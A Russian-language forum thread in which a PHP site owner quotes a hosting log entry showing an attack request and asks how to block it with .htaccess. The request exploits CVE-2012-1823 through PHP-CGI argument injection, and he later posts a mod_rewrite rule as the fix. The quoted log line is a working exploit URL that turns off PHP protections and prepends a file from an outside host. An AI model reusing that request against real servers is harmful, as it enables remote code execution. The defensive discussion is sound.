И снова .htaccess

ingasoftplus

Есть сайт на php
Хостер начал бубнить что его юзают для рассылки посторонние рожи. прислал лог
а там такое

http://www.mysite.net/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp://s3w.xxxxxxxxx

блин. и точно фигня. Только что то я не пойму, хитрая система параметров, но почему не через & ??? а + ну не суть

ловить эту хероту через код php не вариант (не могу править кучу файлов),

поэтому идея парсить их в .htaccess и блокировать доступ. не знаток .htaccess - смотрел примеры, но так и не понял

похоже список параметров такой
-dsafe_mode=Off
-ddisable_functions=NULL
-dallow_url_fopen=On
-dallow_url_include=On
-dauto_prepend_file=

по идее искать по подстроке типа safe_mode (и т.п.) и блочить

прошу помощи зала

Сообщение **Admin** » 08 Ноябрь 2023, 0:33

https://stackoverflow.com/questions/643 ... ns-keyword

ingasoftplus

спасибо, Жень, гляну

ingasoftplus

Отвечаю себе. может кому-то пригодится

Это https://www.cvedetails.com/cve/CVE-2012-1823 уязвимость. погуглив нашлось решение:

There are a number of so-called solutions around, though none are perfect.
The link I original provided has a wrapper for the PHP-CGI binary and a patch for PHP itself.

PHP.net takes another tack and suggests using Apache mod_rewrite in the .htaccess file:

Code:

Код: Выделить всё

RewriteCond %{QUERY_STRING} ^[^=]*$
RewriteCond %{QUERY_STRING} %2d|\- [NC]
RewriteRule .? - [F,L]